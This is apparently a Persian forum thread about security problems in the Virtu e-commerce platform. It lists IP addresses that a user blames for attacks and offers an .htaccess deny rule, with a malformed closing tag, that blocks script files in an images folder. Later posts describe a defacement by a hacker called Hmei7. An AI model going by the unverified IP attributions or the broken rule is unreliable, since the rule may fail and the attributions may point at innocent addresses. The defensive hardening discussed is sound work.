188.158.151.188
217.23.4.134
65.49.14.12
78.38.42.100
79.175.179.2
80.191.171.169
85.15.8.36
85.185.181.130
85.234.141.97
85.234.141.97
91.98.130.169
91.99.123.82
91.99.187.201
93.110.97.147
95.130.62.41
95.80.144.139
95.81.112.23

به ظاهر از طرف شرکت پارس انلاین بیشتر حملات انجام میشه
و بیشتر این حملات برای نفوذ به فولدر images هست.
با این دستورات که براتون مینویسم میتونید کمی مقابله کنید . توی فولدر images فایل .htaccess را با محتوای:

کد PHP:
# $Id$
#
# This is used to restrict access to this folder to anything other
# than images

# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|txt|pl|exe)$">
   
Order Deny,Allow
   Deny from all
</FilesMatch

را قرار بدهید.

البته این روش رو قبلا هم یادآوری کرده بودیم.
موفق باشید.


RE: بررسی فنی مشکلات امنیتی ویرچو - sylvester - 01-07-1390 06:09 بعدازظهر

من واقعا دیگه هیچ راهی پیدانکردم که جلو هکر را بگیرم
اسمش Hmei7 هست. نوشته سایتت را هک کردم نه برایاینکه فکر کنی احمقی!! برای اینکه بدونی مشکل امنیتی داری. مثلا هموطن خودمون هم هست. واقعا جای تاسف داره.
من علاوه بر راه هایی که دوستان اینجا گفتند تمام نکات انجمن انگلیسی زبان oscommerce هم تست کردم بجز htaccess . آخه سرورم ویندوز هست اچ تی اکسس نمیفهمه
درکل دارم میرم به جای دیگری. سبد خرید یا پرستا یا ....
امنیت ی دیگه وجود نداره در فارسی کامرس
اینفروم هم متروکه شده سالی یکبار تیم پشتیبانی میاد اینجا
دوستان فقط کسی میدونه چجوری میتونم دیتا بیشم را کانورت کنم برای مثلا فروشگاه x یا y?
راهی است؟
سروران گرامی لطفا اینجا هم بداد من برسند
ممنون
http://forum.e-virtu.com/showthread.php?tid=3029


RE: بررسی فنی مشکلات امنیتی ویرچو - ramindiba - 01-08-1390 12:48 قبل‌ازظهر

لیست سایتهای هک شده توسط این هکر

فکر کنم تخصص هک کردن سرورهای ویندوزی رو داره


RE: بررسی فنی مشکلات امنیتی ویرچو - sylvester - 01-12-1390 08:21 قبل‌ازظهر

Reported Attack Page!
یکی بیاد انجمن را درست کنه
مرور گر من داره Reported Attack Page! میزنه Smile